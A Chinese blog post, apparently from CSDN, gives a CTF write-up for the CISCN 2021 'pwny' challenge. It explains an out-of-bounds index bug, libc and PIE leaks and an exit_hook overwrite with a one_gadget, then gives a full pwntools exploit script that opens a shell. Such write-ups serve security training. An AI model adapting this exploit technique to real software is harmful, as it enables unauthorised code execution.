ciscn2021 pwn-pwny

最新推荐文章于 2024-05-20 22:22:59 发布
最新推荐文章于 2024-05-20 22:22:59 发布
阅读量409 收藏
点赞数 3
分类专栏: wp 文章标签: 安全 linux 运维 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/124803266
版权

ciscn2021 pwn-pwny

查看保护
在这里插入图片描述
在这里插入图片描述
程序初始化的时候fd取的是一个随机数
在这里插入图片描述
所以在程序运行的时候直接read的时候会出错,因为找的是无效内存。所我们需要将fd变成0就可以正常使用read这个东西了。
在这里插入图片描述
在这里有个很明显的漏洞,没有限制index,所以可以oob利用。
攻击思路:fd变成0才可以正常利用,看一下202060有什么地址可以让oob发挥作用。
在这里插入图片描述
fd刚好就在202060这里,所以我们直接利用oob将fd给覆盖成0。
fd为0之后可以正常的读地址了,借助read功能读取libc和pie,这里可以借助上面的puts地址和off_202008这个程序数据。
拿到这些之后算出libc_base和pie的基址,最后想要getshell的话我们可以打exit_hook为one_gadget。
所以我们拿到exit_hook的地址,算出offest,利用oob改掉就可以了
这里的one_gadget正常的不可以使用,加上-l 1参数之后再选用就可以了

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 0
if debug:
    r = remote()
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Your choice: '

def write(index):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Index: ', str(index))

def read(index):
    r.sendlineafter(menu, '1')
    r.sendafter('Index: ', index)

write(256)
write(256)

puts_got = 0x201F98
vuln_addr = 0x202060

puts_offest = (puts_got - vuln_addr) // 8
puts_offest = 0xFFFFFFFFFFFFFFFF + puts_offest + 1
li('puts_offest = ' + hex(puts_offest))

read(p64(puts_offest))

r.recvuntil('Result: ')
puts_addr = int(r.recv(12), 16)
li('puts_addr = ' + hex(puts_addr))
libc = ELF('./libc-2.27.so')
libc_base = puts_addr - libc.sym['puts']
one = [0x4f3d5, 0x4f432, 0x10a41c, 0x10a428]
one_gadget = one[3] + libc_base

data_addr = 0x202008
data_offest = (data_addr - vuln_addr) // 8
data_offest = 0xFFFFFFFFFFFFFFFF + data_offest + 1
li('data_offest = ' + hex(data_offest))

read(p64(data_offest))
r.recvuntil('Result: ')
pie_addr = int(r.recv(12), 16)
li('pie_addr = ' + hex(pie_addr))

pie_base = pie_addr - 0x202008
li('pie_base = ' + hex(pie_base))

exit_hook = libc_base + 0x61bf60
exit_offest = (exit_hook - pie_base - vuln_addr) // 8
li('exit_offest = ' + hex(exit_offest))
r.sendlineafter(menu, '2')
r.sendlineafter('Index: ', str(exit_offest))
r.sendline(p64(one_gadget))

r.sendlineafter(menu, '3')

r.interactive()
z1r0.
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[cstc2021]wp
Huamang的博客
05-06 2050
RGB 给了一堆rgb值,用python把他们写出来 from PIL import Image x = 11*2*2*2*2*2*2 y = 41 im = Image.new("RGB",(x,y)) file = open('code.txt') for i in range(0,x): for j in range(0,y): line = file.readline().rstrip("\n") rgb = line.split("#") im.putpixel(
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2176
2022 CISCN 初赛pwn的完整wp
CISCN初赛wp misc,re,pwn,web,crypto
最新发布
fivesheeptree的博客
05-20 837
CISCN初赛wp misc,re,pwn,web,crypto
2022CISCN初赛 WP
Lum1n0us's Blog
05-29 1216
文章目录Crypto签到电台 Crypto 签到电台 在公众号找到提示 在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。 发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。 “弼时安全到达了”所对应的7个电码: 1732 2514 1344 0356 0451 6671 0055 模十算法示例:1732与6378得到7000 发包示例:/sen
CISCN国赛--wp
qing_chuan_的博客
05-31 673
第一次参加国赛,我一个小菜鸡,真的纯纯是坐牢。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
gris-treinamentos-pwn-2021
03-31
gris-treinamentos-pwn-2021 幻灯片浏览器
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
2023华中赛区ciscn部分wp
qq_42557115的博客
06-29 2314
今年ciscn华中的CTF还行,基本上都肝出来了,拿了个前十,但是awd拿了个倒一....综合一下拿了个第三,可恶,错失国防科技大学参观机会()把CTF的wp写一下,供大家参考。赛题不分上下午场了。
2023CISCN部分wp
qq_51862722的博客
05-29 758
2023ciscn部分wp
2020ciscn wp
qq_52342676的博客
05-30 764
第十五届全国大学生信息安全竞赛创新实践能力赛
ciscn2021CTF国赛pwn解
qq_39948058的博客
08-27 1293
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
第15届全国大学生知识竞赛 2022ciscn初赛 部分wp
blowed的博客
05-31 1516
Misc ez_usb 1.键盘流量 USB协议数据部分在Leftover Capture Data域中,数据长度为八个字节。其中键盘击键信息集中在第三个字节中。 如图,发现击键信息为0x06,即对应的按键为C 2.鼠标流量 USB协议鼠标数据部分在Leftover Capture Data域中,数据长度为四个字节。 其中第一个字节代表按键,当取0x00时,代表没有按键、为0x01时,代表按左键,为0x02时,代表当前按键为右键。 第二个字节可以看成是一个signed byte类型,
2022CISCN部分wp misc pwn
qq_42951211的博客
06-03 816
2022CISCN部分wp
CISCN2018-WP
04-30 666
MISC: 验证码: 用token登录 输入好验证码就可以得到flag Picture: 图片隐写,一下就想到binwalk或者winhex打开试试 binwalk打开无果 将这段数据ctrl+shift+c复制出来 用下面python脚本生成zip文件。 import zlib import binascii import base64 id=”...
2022 CISCN全国初赛-wp
qq_45603443的博客
05-30 1787
2022 CISCN全国初赛-wpWebEzpoponline_crtMiscez_usbCrypto签到基于挑战码的双向认证基于挑战码的双向认证2基于挑战码的双向认证3Pwnpwn1重点来了 Web Ezpop <?php namespace think{ abstract class Model{ private $lazySave = false; private $data = []; private $exists = false; protected $table; private $wi
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值